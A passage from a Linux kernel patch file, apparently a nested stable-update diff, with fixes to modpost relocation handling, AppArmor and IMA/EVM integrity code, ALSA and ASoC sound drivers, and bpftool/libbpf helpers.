+-	(((Cur) == (Start) + 1) && (strcmp("__ex_table", (Sec)) == 0))
+-
+ static void report_extable_warnings(const char* modname, struct elf_info* elf,
+ 				    const struct sectioncheck* const mismatch,
+ 				    Elf_Rela* r, Elf_Sym* sym,
+@@ -1392,22 +1359,9 @@ static void extable_mismatch_handler(const char* modname, struct elf_info *elf,
+ 		      "You might get more information about where this is\n"
+ 		      "coming from by using scripts/check_extable.sh %s\n",
+ 		      fromsec, (long)r->r_offset, tosec, modname);
+-	else if (!is_executable_section(elf, get_secindex(elf, sym))) {
+-		if (is_extable_fault_address(r))
+-			fatal("The relocation at %s+0x%lx references\n"
+-			      "section \"%s\" which is not executable, IOW\n"
+-			      "it is not possible for the kernel to fault\n"
+-			      "at that address.  Something is seriously wrong\n"
+-			      "and should be fixed.\n",
+-			      fromsec, (long)r->r_offset, tosec);
+-		else
+-			fatal("The relocation at %s+0x%lx references\n"
+-			      "section \"%s\" which is not executable, IOW\n"
+-			      "the kernel will fault if it ever tries to\n"
+-			      "jump to it.  Something is seriously wrong\n"
+-			      "and should be fixed.\n",
+-			      fromsec, (long)r->r_offset, tosec);
+-	}
++	else if (!is_executable_section(elf, get_secindex(elf, sym)))
++		error("%s+0x%lx references non-executable section '%s'\n",
++		      fromsec, (long)r->r_offset, tosec);
+ }
+ 
+ static void check_section_mismatch(const char *modname, struct elf_info *elf,
+@@ -1465,19 +1419,33 @@ static int addend_386_rel(struct elf_info *elf, Elf_Shdr *sechdr, Elf_Rela *r)
+ #define	R_ARM_THM_JUMP19	51
+ #endif
+ 
++static int32_t sign_extend32(int32_t value, int index)
++{
++	uint8_t shift = 31 - index;
++
++	return (int32_t)(value << shift) >> shift;
++}
++
+ static int addend_arm_rel(struct elf_info *elf, Elf_Shdr *sechdr, Elf_Rela *r)
+ {
+ 	unsigned int r_typ = ELF_R_TYPE(r->r_info);
++	Elf_Sym *sym = elf->symtab_start + ELF_R_SYM(r->r_info);
++	void *loc = reloc_location(elf, sechdr, r);
++	uint32_t inst;
++	int32_t offset;
+ 
+ 	switch (r_typ) {
+ 	case R_ARM_ABS32:
+-		/* From ARM ABI: (S + A) | T */
+-		r->r_addend = (int)(long)
+-			      (elf->symtab_start + ELF_R_SYM(r->r_info));
++		inst = TO_NATIVE(*(uint32_t *)loc);
++		r->r_addend = inst + sym->st_value;
+ 		break;
+ 	case R_ARM_PC24:
+ 	case R_ARM_CALL:
+ 	case R_ARM_JUMP24:
++		inst = TO_NATIVE(*(uint32_t *)loc);
++		offset = sign_extend32((inst & 0x00ffffff) << 2, 25);
++		r->r_addend = offset + sym->st_value + 8;
++		break;
+ 	case R_ARM_THM_CALL:
+ 	case R_ARM_THM_JUMP24:
+ 	case R_ARM_THM_JUMP19:
+@@ -1569,8 +1537,6 @@ static void section_rela(const char *modname, struct elf_info *elf,
+ 		/* Skip special sections */
+ 		if (is_shndx_special(sym->st_shndx))
+ 			continue;
+-		if (is_second_extable_reloc(start, rela, fromsec))
+-			find_extable_entry_size(fromsec, &r);
+ 		check_section_mismatch(modname, elf, &r, sym, fromsec);
+ 	}
+ }
+@@ -1628,8 +1594,6 @@ static void section_rel(const char *modname, struct elf_info *elf,
+ 		/* Skip special sections */
+ 		if (is_shndx_special(sym->st_shndx))
+ 			continue;
+-		if (is_second_extable_reloc(start, rel, fromsec))
+-			find_extable_entry_size(fromsec, &r);
+ 		check_section_mismatch(modname, elf, &r, sym, fromsec);
+ 	}
+ }
+diff --git a/security/apparmor/policy_unpack.c b/security/apparmor/policy_unpack.c
+index 9d26bbb901338..9c3fec2c7cf6b 100644
+--- a/security/apparmor/policy_unpack.c
++++ b/security/apparmor/policy_unpack.c
+@@ -917,8 +917,13 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 				goto fail;
+ 			}
+ 
+-			rhashtable_insert_fast(profile->data, &data->head,
+-					       profile->data->p);
++			if (rhashtable_insert_fast(profile->data, &data->head,
++						   profile->data->p)) {
++				kfree_sensitive(data->key);
++				kfree_sensitive(data);
++				info = "failed to insert data to table";
++				goto fail;
++			}
+ 		}
+ 
+ 		if (!unpack_nameX(e, AA_STRUCTEND, NULL)) {
+diff --git a/security/integrity/evm/evm_crypto.c b/security/integrity/evm/evm_crypto.c
+index 708de9656bbd2..b9395f8ef5829 100644
+--- a/security/integrity/evm/evm_crypto.c
++++ b/security/integrity/evm/evm_crypto.c
+@@ -40,7 +40,7 @@ static const char evm_hmac[] = "hmac(sha1)";
+ /**
+  * evm_set_key() - set EVM HMAC key from the kernel
+  * @key: pointer to a buffer with the key data
+- * @size: length of the key data
++ * @keylen: length of the key data
+  *
+  * This function allows setting the EVM HMAC key from the kernel
+  * without using the "encrypted" key subsystem keys. It can be used
+diff --git a/security/integrity/evm/evm_main.c b/security/integrity/evm/evm_main.c
+index 23d484e05e6f2..a338f19447d03 100644
+--- a/security/integrity/evm/evm_main.c
++++ b/security/integrity/evm/evm_main.c
+@@ -318,7 +318,6 @@ int evm_protected_xattr_if_enabled(const char *req_xattr_name)
+ /**
+  * evm_read_protected_xattrs - read EVM protected xattr names, lengths, values
+  * @dentry: dentry of the read xattrs
+- * @inode: inode of the read xattrs
+  * @buffer: buffer xattr names, lengths or values are copied to
+  * @buffer_size: size of buffer
+  * @type: n: names, l: lengths, v: values
+@@ -390,6 +389,7 @@ int evm_read_protected_xattrs(struct dentry *dentry, u8 *buffer,
+  * @xattr_name: requested xattr
+  * @xattr_value: requested xattr value
+  * @xattr_value_len: requested xattr value length
++ * @iint: inode integrity metadata
+  *
+  * Calculate the HMAC for the given dentry and verify it against the stored
+  * security.evm xattr. For performance, use the xattr value and length
+@@ -776,7 +776,9 @@ static int evm_attr_change(struct user_namespace *mnt_userns,
+ 
+ /**
+  * evm_inode_setattr - prevent updating an invalid EVM extended attribute
++ * @idmap: idmap of the mount
+  * @dentry: pointer to the affected dentry
++ * @attr: iattr structure containing the new file attributes
+  *
+  * Permit update of file attributes when files have a valid EVM signature,
+  * except in the case of them having an immutable portable signature.
+diff --git a/security/integrity/iint.c b/security/integrity/iint.c
+index 8638976f7990b..65418e0906c13 100644
+--- a/security/integrity/iint.c
++++ b/security/integrity/iint.c
+@@ -43,12 +43,10 @@ static struct integrity_iint_cache *__integrity_iint_find(struct inode *inode)
+ 		else if (inode > iint->inode)
+ 			n = n->rb_right;
+ 		else
+-			break;
++			return iint;
+ 	}
+-	if (!n)
+-		return NULL;
+ 
+-	return iint;
++	return NULL;
+ }
+ 
+ /*
+@@ -121,10 +119,15 @@ struct integrity_iint_cache *integrity_inode_get(struct inode *inode)
+ 		parent = *p;
+ 		test_iint = rb_entry(parent, struct integrity_iint_cache,
+ 				     rb_node);
+-		if (inode < test_iint->inode)
++		if (inode < test_iint->inode) {
+ 			p = &(*p)->rb_left;
+-		else
++		} else if (inode > test_iint->inode) {
+ 			p = &(*p)->rb_right;
++		} else {
++			write_unlock(&integrity_iint_lock);
++			kmem_cache_free(iint_cache, iint);
++			return test_iint;
++		}
+ 	}
+ 
+ 	iint->inode = inode;
+diff --git a/security/integrity/ima/ima_modsig.c b/security/integrity/ima/ima_modsig.c
+index fb25723c65bc4..3e7bee30080f2 100644
+--- a/security/integrity/ima/ima_modsig.c
++++ b/security/integrity/ima/ima_modsig.c
+@@ -89,6 +89,9 @@ int ima_read_modsig(enum ima_hooks func, const void *buf, loff_t buf_len,
+ 
+ /**
+  * ima_collect_modsig - Calculate the file hash without the appended signature.
++ * @modsig: parsed module signature
++ * @buf: data to verify the signature on
++ * @size: data size
+  *
+  * Since the modsig is part of the file contents, the hash used in its signature
+  * isn't the same one ordinarily calculated by IMA. Therefore PKCS7 code
+diff --git a/security/integrity/ima/ima_policy.c b/security/integrity/ima/ima_policy.c
+index 2edff7f58c25c..bdc40535ff489 100644
+--- a/security/integrity/ima/ima_policy.c
++++ b/security/integrity/ima/ima_policy.c
+@@ -694,6 +694,7 @@ static int get_subaction(struct ima_rule_entry *rule, enum ima_hooks func)
+  * @secid: LSM secid of the task to be validated
+  * @func: IMA hook identifier
+  * @mask: requested action (MAY_READ | MAY_WRITE | MAY_APPEND | MAY_EXEC)
++ * @flags: IMA actions to consider (e.g. IMA_MEASURE | IMA_APPRAISE)
+  * @pcr: set the pcr to extend
+  * @template_desc: the template that should be used for this rule
+  * @func_data: func specific data, may be NULL
+@@ -1885,7 +1886,7 @@ static int ima_parse_rule(char *rule, struct ima_rule_entry *entry)
+ 
+ /**
+  * ima_parse_add_rule - add a rule to ima_policy_rules
+- * @rule - ima measurement policy rule
++ * @rule: ima measurement policy rule
+  *
+  * Avoid locking by allowing just one writer at a time in ima_write_policy()
+  * Returns the length of the rule parsed, an error code on failure
+diff --git a/sound/core/jack.c b/sound/core/jack.c
+index 88493cc31914b..03d155ed362b4 100644
+--- a/sound/core/jack.c
++++ b/sound/core/jack.c
+@@ -654,6 +654,7 @@ void snd_jack_report(struct snd_jack *jack, int status)
+ 	struct snd_jack_kctl *jack_kctl;
+ 	unsigned int mask_bits = 0;
+ #ifdef CONFIG_SND_JACK_INPUT_DEV
++	struct input_dev *idev;
+ 	int i;
+ #endif
+ 
+@@ -670,17 +671,15 @@ void snd_jack_report(struct snd_jack *jack, int status)
+ 					     status & jack_kctl->mask_bits);
+ 
+ #ifdef CONFIG_SND_JACK_INPUT_DEV
+-	mutex_lock(&jack->input_dev_lock);
+-	if (!jack->input_dev) {
+-		mutex_unlock(&jack->input_dev_lock);
++	idev = input_get_device(jack->input_dev);
++	if (!idev)
+ 		return;
+-	}
+ 
+ 	for (i = 0; i < ARRAY_SIZE(jack->key); i++) {
+ 		int testbit = ((SND_JACK_BTN_0 >> i) & ~mask_bits);
+ 
+ 		if (jack->type & testbit)
+-			input_report_key(jack->input_dev, jack->key[i],
++			input_report_key(idev, jack->key[i],
+ 					 status & testbit);
+ 	}
+ 
+@@ -688,13 +687,13 @@ void snd_jack_report(struct snd_jack *jack, int status)
+ 		int testbit = ((1 << i) & ~mask_bits);
+ 
+ 		if (jack->type & testbit)
+-			input_report_switch(jack->input_dev,
++			input_report_switch(idev,
+ 					    jack_switch_types[i],
+ 					    status & testbit);
+ 	}
+ 
+-	input_sync(jack->input_dev);
+-	mutex_unlock(&jack->input_dev_lock);
++	input_sync(idev);
++	input_put_device(idev);
+ #endif /* CONFIG_SND_JACK_INPUT_DEV */
+ }
+ EXPORT_SYMBOL(snd_jack_report);
+diff --git a/sound/core/pcm_memory.c b/sound/core/pcm_memory.c
+index 7bde7fb64011e..a0b9514716995 100644
+--- a/sound/core/pcm_memory.c
++++ b/sound/core/pcm_memory.c
+@@ -31,15 +31,41 @@ static unsigned long max_alloc_per_card = 32UL * 1024UL * 1024UL;
+ module_param(max_alloc_per_card, ulong, 0644);
+ MODULE_PARM_DESC(max_alloc_per_card, "Max total allocation bytes per card.");
+ 
++static void __update_allocated_size(struct snd_card *card, ssize_t bytes)
++{
++	card->total_pcm_alloc_bytes += bytes;
++}
++
++static void update_allocated_size(struct snd_card *card, ssize_t bytes)
++{
++	mutex_lock(&card->memory_mutex);
++	__update_allocated_size(card, bytes);
++	mutex_unlock(&card->memory_mutex);
++}
++
++static void decrease_allocated_size(struct snd_card *card, size_t bytes)
++{
++	mutex_lock(&card->memory_mutex);
++	WARN_ON(card->total_pcm_alloc_bytes < bytes);
++	__update_allocated_size(card, -(ssize_t)bytes);
++	mutex_unlock(&card->memory_mutex);
++}
++
+ static int do_alloc_pages(struct snd_card *card, int type, struct device *dev,
+ 			  int str, size_t size, struct snd_dma_buffer *dmab)
+ {
+ 	enum dma_data_direction dir;
+ 	int err;
+ 
++	/* check and reserve the requested size */
++	mutex_lock(&card->memory_mutex);
+ 	if (max_alloc_per_card &&
+-	    card->total_pcm_alloc_bytes + size > max_alloc_per_card)
++	    card->total_pcm_alloc_bytes + size > max_alloc_per_card) {
++		mutex_unlock(&card->memory_mutex);
+ 		return -ENOMEM;
++	}
++	__update_allocated_size(card, size);
++	mutex_unlock(&card->memory_mutex);
+ 
+ 	if (str == SNDRV_PCM_STREAM_PLAYBACK)
+ 		dir = DMA_TO_DEVICE;
+@@ -47,9 +73,14 @@ static int do_alloc_pages(struct snd_card *card, int type, struct device *dev,
+ 		dir = DMA_FROM_DEVICE;
+ 	err = snd_dma_alloc_dir_pages(type, dev, dir, size, dmab);
+ 	if (!err) {
+-		mutex_lock(&card->memory_mutex);
+-		card->total_pcm_alloc_bytes += dmab->bytes;
+-		mutex_unlock(&card->memory_mutex);
++		/* the actual allocation size might be bigger than requested,
++		 * and we need to correct the account
++		 */
++		if (dmab->bytes != size)
++			update_allocated_size(card, dmab->bytes - size);
++	} else {
++		/* take back on allocation failure */
++		decrease_allocated_size(card, size);
+ 	}
+ 	return err;
+ }
+@@ -58,10 +89,7 @@ static void do_free_pages(struct snd_card *card, struct snd_dma_buffer *dmab)
+ {
+ 	if (!dmab->area)
+ 		return;
+-	mutex_lock(&card->memory_mutex);
+-	WARN_ON(card->total_pcm_alloc_bytes < dmab->bytes);
+-	card->total_pcm_alloc_bytes -= dmab->bytes;
+-	mutex_unlock(&card->memory_mutex);
++	decrease_allocated_size(card, dmab->bytes);
+ 	snd_dma_free_pages(dmab);
+ 	dmab->area = NULL;
+ }
+diff --git a/sound/pci/ac97/ac97_codec.c b/sound/pci/ac97/ac97_codec.c
+index ff685321f1a11..534ea7a256ec3 100644
+--- a/sound/pci/ac97/ac97_codec.c
++++ b/sound/pci/ac97/ac97_codec.c
+@@ -2070,8 +2070,8 @@ int snd_ac97_mixer(struct snd_ac97_bus *bus, struct snd_ac97_template *template,
+ 		.dev_disconnect =	snd_ac97_dev_disconnect,
+ 	};
+ 
+-	if (rac97)
+-		*rac97 = NULL;
++	if (!rac97)
++		return -EINVAL;
+ 	if (snd_BUG_ON(!bus || !template))
+ 		return -EINVAL;
+ 	if (snd_BUG_ON(template->num >= 4))
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index eb049014f87ac..72fa1509cc4ba 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9490,9 +9490,9 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b63, "HP Elite Dragonfly 13.5 inch G4", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b65, "HP ProBook 455 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b66, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+-	SND_PCI_QUIRK(0x103c, 0x8b70, "HP EliteBook 835 G10", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x103c, 0x8b72, "HP EliteBook 845 G10", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x103c, 0x8b74, "HP EliteBook 845W G10", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x103c, 0x8b70, "HP EliteBook 835 G10", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b72, "HP EliteBook 845 G10", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b74, "HP EliteBook 845W G10", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b77, "HP ElieBook 865 G10", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+@@ -9680,6 +9680,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x971d, "Clevo N970T[CDF]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa500, "Clevo NL5[03]RU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa600, "Clevo NL50NU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0xa650, "Clevo NP[567]0SN[CD]", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa671, "Clevo NP70SN[CDE]", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb018, "Clevo NP50D[BE]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb019, "Clevo NH77D[BE]Q", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+diff --git a/sound/soc/amd/acp/acp-pdm.c b/sound/soc/amd/acp/acp-pdm.c
+index 66ec6b6a59723..f8030b79ac17c 100644
+--- a/sound/soc/amd/acp/acp-pdm.c
++++ b/sound/soc/amd/acp/acp-pdm.c
+@@ -176,7 +176,7 @@ static void acp_dmic_dai_shutdown(struct snd_pcm_substream *substream,
+ 
+ 	/* Disable DMIC interrupts */
+ 	ext_int_ctrl = readl(ACP_EXTERNAL_INTR_CNTL(adata, 0));
+-	ext_int_ctrl |= ~PDM_DMA_INTR_MASK;
++	ext_int_ctrl &= ~PDM_DMA_INTR_MASK;
+ 	writel(ext_int_ctrl, ACP_EXTERNAL_INTR_CNTL(adata, 0));
+ }
+ 
+diff --git a/sound/soc/codecs/es8316.c b/sound/soc/codecs/es8316.c
+index f7d7a9c91e04c..87775378362e7 100644
+--- a/sound/soc/codecs/es8316.c
++++ b/sound/soc/codecs/es8316.c
+@@ -52,7 +52,12 @@ static const SNDRV_CTL_TLVD_DECLARE_DB_SCALE(dac_vol_tlv, -9600, 50, 1);
+ static const SNDRV_CTL_TLVD_DECLARE_DB_SCALE(adc_vol_tlv, -9600, 50, 1);
+ static const SNDRV_CTL_TLVD_DECLARE_DB_SCALE(alc_max_gain_tlv, -650, 150, 0);
+ static const SNDRV_CTL_TLVD_DECLARE_DB_SCALE(alc_min_gain_tlv, -1200, 150, 0);
+-static const SNDRV_CTL_TLVD_DECLARE_DB_SCALE(alc_target_tlv, -1650, 150, 0);
++
++static const SNDRV_CTL_TLVD_DECLARE_DB_RANGE(alc_target_tlv,
++	0, 10, TLV_DB_SCALE_ITEM(-1650, 150, 0),
++	11, 11, TLV_DB_SCALE_ITEM(-150, 0, 0),
++);
++
+ static const SNDRV_CTL_TLVD_DECLARE_DB_RANGE(hpmixer_gain_tlv,
+ 	0, 4, TLV_DB_SCALE_ITEM(-1200, 150, 0),
+ 	8, 11, TLV_DB_SCALE_ITEM(-450, 150, 0),
+@@ -115,7 +120,7 @@ static const struct snd_kcontrol_new es8316_snd_controls[] = {
+ 		       alc_max_gain_tlv),
+ 	SOC_SINGLE_TLV("ALC Capture Min Volume", ES8316_ADC_ALC2, 0, 28, 0,
+ 		       alc_min_gain_tlv),
+-	SOC_SINGLE_TLV("ALC Capture Target Volume", ES8316_ADC_ALC3, 4, 10, 0,
++	SOC_SINGLE_TLV("ALC Capture Target Volume", ES8316_ADC_ALC3, 4, 11, 0,
+ 		       alc_target_tlv),
+ 	SOC_SINGLE("ALC Capture Hold Time", ES8316_ADC_ALC3, 0, 10, 0),
+ 	SOC_SINGLE("ALC Capture Decay Time", ES8316_ADC_ALC4, 4, 10, 0),
+@@ -364,13 +369,11 @@ static int es8316_set_dai_sysclk(struct snd_soc_dai *codec_dai,
+ 	int count = 0;
+ 
+ 	es8316->sysclk = freq;
++	es8316->sysclk_constraints.list = NULL;
++	es8316->sysclk_constraints.count = 0;
+ 
+-	if (freq == 0) {
+-		es8316->sysclk_constraints.list = NULL;
+-		es8316->sysclk_constraints.count = 0;
+-
++	if (freq == 0)
+ 		return 0;
+-	}
+ 
+ 	ret = clk_set_rate(es8316->mclk, freq);
+ 	if (ret)
+@@ -386,8 +389,10 @@ static int es8316_set_dai_sysclk(struct snd_soc_dai *codec_dai,
+ 			es8316->allowed_rates[count++] = freq / ratio;
+ 	}
+ 
+-	es8316->sysclk_constraints.list = es8316->allowed_rates;
+-	es8316->sysclk_constraints.count = count;
++	if (count) {
++		es8316->sysclk_constraints.list = es8316->allowed_rates;
++		es8316->sysclk_constraints.count = count;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/fsl/imx-audmix.c b/sound/soc/fsl/imx-audmix.c
+index 1292a845c4244..d8e99b263ab21 100644
+--- a/sound/soc/fsl/imx-audmix.c
++++ b/sound/soc/fsl/imx-audmix.c
+@@ -228,6 +228,8 @@ static int imx_audmix_probe(struct platform_device *pdev)
+ 
+ 		dai_name = devm_kasprintf(&pdev->dev, GFP_KERNEL, "%s%s",
+ 					  fe_name_pref, args.np->full_name + 1);
++		if (!dai_name)
++			return -ENOMEM;
+ 
+ 		dev_info(pdev->dev.parent, "DAI FE name:%s\n", dai_name);
+ 
+@@ -236,6 +238,8 @@ static int imx_audmix_probe(struct platform_device *pdev)
+ 			capture_dai_name =
+ 				devm_kasprintf(&pdev->dev, GFP_KERNEL, "%s %s",
+ 					       dai_name, "CPU-Capture");
++			if (!capture_dai_name)
++				return -ENOMEM;
+ 		}
+ 
+ 		priv->dai[i].cpus = &dlc[0];
+@@ -266,6 +270,8 @@ static int imx_audmix_probe(struct platform_device *pdev)
+ 				       "AUDMIX-Playback-%d", i);
+ 		be_cp = devm_kasprintf(&pdev->dev, GFP_KERNEL,
+ 				       "AUDMIX-Capture-%d", i);
++		if (!be_name || !be_pb || !be_cp)
++			return -ENOMEM;
+ 
+ 		priv->dai[num_dai + i].cpus = &dlc[3];
+ 		priv->dai[num_dai + i].codecs = &dlc[4];
+@@ -293,6 +299,9 @@ static int imx_audmix_probe(struct platform_device *pdev)
+ 		priv->dapm_routes[i].source =
+ 			devm_kasprintf(&pdev->dev, GFP_KERNEL, "%s %s",
+ 				       dai_name, "CPU-Playback");
++		if (!priv->dapm_routes[i].source)
++			return -ENOMEM;
++
+ 		priv->dapm_routes[i].sink = be_pb;
+ 		priv->dapm_routes[num_dai + i].source   = be_pb;
+ 		priv->dapm_routes[num_dai + i].sink     = be_cp;
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index d4f92bb5e29f8..a37c85d301471 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -372,7 +372,7 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 		.matches = {
+ 			DMI_MATCH(DMI_PRODUCT_FAMILY, "Intel_mtlrvp"),
+ 		},
+-		.driver_data = (void *)(RT711_JD1 | SOF_SDW_TGL_HDMI),
++		.driver_data = (void *)(RT711_JD1),
+ 	},
+ 	{}
+ };
+diff --git a/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c b/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c
+index bc155dd937e0b..a41611671ef6e 100644
+--- a/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c
++++ b/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c
+@@ -1070,6 +1070,10 @@ static int mt8173_afe_pcm_dev_probe(struct platform_device *pdev)
+ 
+ 	afe->dev = &pdev->dev;
+ 
++	irq_id = platform_get_irq(pdev, 0);
++	if (irq_id <= 0)
++		return irq_id < 0 ? irq_id : -ENXIO;
++
+ 	afe->base_addr = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(afe->base_addr))
+ 		return PTR_ERR(afe->base_addr);
+@@ -1156,14 +1160,14 @@ static int mt8173_afe_pcm_dev_probe(struct platform_device *pdev)
+ 	comp_hdmi = devm_kzalloc(&pdev->dev, sizeof(*comp_hdmi), GFP_KERNEL);
+ 	if (!comp_hdmi) {
+ 		ret = -ENOMEM;
+-		goto err_pm_disable;
++		goto err_cleanup_components;
+ 	}
+ 
+ 	ret = snd_soc_component_initialize(comp_hdmi,
+ 					   &mt8173_afe_hdmi_dai_component,
+ 					   &pdev->dev);
+ 	if (ret)
+-		goto err_pm_disable;
++		goto err_cleanup_components;
+ 
+ #ifdef CONFIG_DEBUG_FS
+ 	comp_hdmi->debugfs_prefix = "hdmi";
+@@ -1175,14 +1179,11 @@ static int mt8173_afe_pcm_dev_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_cleanup_components;
+ 
+-	irq_id = platform_get_irq(pdev, 0);
+-	if (irq_id <= 0)
+-		return irq_id < 0 ? irq_id : -ENXIO;
+ 	ret = devm_request_irq(afe->dev, irq_id, mt8173_afe_irq_handler,
+ 			       0, "Afe_ISR_Handle", (void *)afe);
+ 	if (ret) {
+ 		dev_err(afe->dev, "could not request_irq\n");
+-		goto err_pm_disable;
++		goto err_cleanup_components;
+ 	}
+ 
+ 	dev_info(&pdev->dev, "MT8173 AFE driver initialized.\n");
+diff --git a/tools/bpf/bpftool/feature.c b/tools/bpf/bpftool/feature.c
+index 36cf0f1517c94..4460399bc8ed8 100644
+--- a/tools/bpf/bpftool/feature.c
++++ b/tools/bpf/bpftool/feature.c
+@@ -167,12 +167,12 @@ static int get_vendor_id(int ifindex)
+ 	return strtol(buf, NULL, 0);
+ }
+ 
+-static int read_procfs(const char *path)
++static long read_procfs(const char *path)
+ {
+ 	char *endptr, *line = NULL;
+ 	size_t len = 0;
+ 	FILE *fd;
+-	int res;
++	long res;
+ 
+ 	fd = fopen(path, "r");
+ 	if (!fd)
+@@ -194,7 +194,7 @@ static int read_procfs(const char *path)
+ 
+ static void probe_unprivileged_disabled(void)
+ {
+-	int res;
++	long res;
+ 
+ 	/* No support for C-style ouptut */
+ 
+@@ -216,14 +216,14 @@ static void probe_unprivileged_disabled(void)
+ 			printf("Unable to retrieve required privileges for bpf() syscall\n");
+ 			break;
+ 		default:
+-			printf("bpf() syscall restriction has unknown value %d\n", res);
++			printf("bpf() syscall restriction has unknown value %ld\n", res);
+ 		}
+ 	}
+ }
+ 
+ static void probe_jit_enable(void)
+ {
+-	int res;
++	long res;
+ 
+ 	/* No support for C-style ouptut */
+ 
+@@ -245,7 +245,7 @@ static void probe_jit_enable(void)
+ 			printf("Unable to retrieve JIT-compiler status\n");
+ 			break;
+ 		default:
+-			printf("JIT-compiler status has unknown value %d\n",
++			printf("JIT-compiler status has unknown value %ld\n",
+ 			       res);
+ 		}
+ 	}
+@@ -253,7 +253,7 @@ static void probe_jit_enable(void)
+ 
+ static void probe_jit_harden(void)
+ {
+-	int res;
++	long res;
+ 
+ 	/* No support for C-style ouptut */
+ 
+@@ -275,7 +275,7 @@ static void probe_jit_harden(void)
+ 			printf("Unable to retrieve JIT hardening status\n");
+ 			break;
+ 		default:
+-			printf("JIT hardening status has unknown value %d\n",
++			printf("JIT hardening status has unknown value %ld\n",
+ 			       res);
+ 		}
+ 	}
+@@ -283,7 +283,7 @@ static void probe_jit_harden(void)
+ 
+ static void probe_jit_kallsyms(void)
+ {
+-	int res;
++	long res;
+ 
+ 	/* No support for C-style ouptut */
+ 
+@@ -302,14 +302,14 @@ static void probe_jit_kallsyms(void)
+ 			printf("Unable to retrieve JIT kallsyms export status\n");
+ 			break;
+ 		default:
+-			printf("JIT kallsyms exports status has unknown value %d\n", res);
++			printf("JIT kallsyms exports status has unknown value %ld\n", res);
+ 		}
+ 	}
+ }
+ 
+ static void probe_jit_limit(void)
+ {
+-	int res;
++	long res;
+ 
+ 	/* No support for C-style ouptut */
+ 
+@@ -322,7 +322,7 @@ static void probe_jit_limit(void)
+ 			printf("Unable to retrieve global memory limit for JIT compiler for unprivileged users\n");
+ 			break;
+ 		default:
+-			printf("Global memory limit for JIT compiler for unprivileged users is %d bytes\n", res);
++			printf("Global memory limit for JIT compiler for unprivileged users is %ld bytes\n", res);
+ 		}
+ 	}
+ }
+diff --git a/tools/lib/bpf/bpf_helpers.h b/tools/lib/bpf/bpf_helpers.h
+index d37c4fe2849d2..2b3b300bf4dfa 100644
+--- a/tools/lib/bpf/bpf_helpers.h
++++ b/tools/lib/bpf/bpf_helpers.h
+@@ -77,16 +77,21 @@
+ /*
+  * Helper macros to manipulate data structures
+  */
+-#ifndef offsetof
+-#define offsetof(TYPE, MEMBER)	((unsigned long)&((TYPE *)0)->MEMBER)
+-#endif
+-#ifndef container_of
++
++/* offsetof() definition that uses __builtin_offset() might not preserve field
++ * offset CO-RE relocation properly, so force-redefine offsetof() using
++ * old-school approach which works with CO-RE correctly
++ */
++#undef offsetof
++#define offsetof(type, member)	((unsigned long)&((type *)0)->member)
++
++/* redefined container_of() to ensure we use the above offsetof() macro */
++#undef container_of
+ #define container_of(ptr, type, member)				\
+ 	({							\
+ 		void *__mptr = (void *)(ptr);			\
+ 		((type *)(__mptr - offsetof(type, member)));	\
+ 	})
+-#endif
+ 
+ /*
+  * Compiler (optimization) barrier.
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 4cd1d49c94d6d..713264899250a 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -2213,9 +2213,25 @@ static int btf_dump_type_data_check_overflow(struct btf_dump *d,
+ 					     const struct btf_type *t,
+ 					     __u32 id,
+ 					     const void *data,
+-					     __u8 bits_offset)
++					     __u8 bits_offset,
++					     __u8 bit_sz)
+ {
+-	__s64 size = btf__resolve_size(d->btf, id);
++	__s64 size;
++
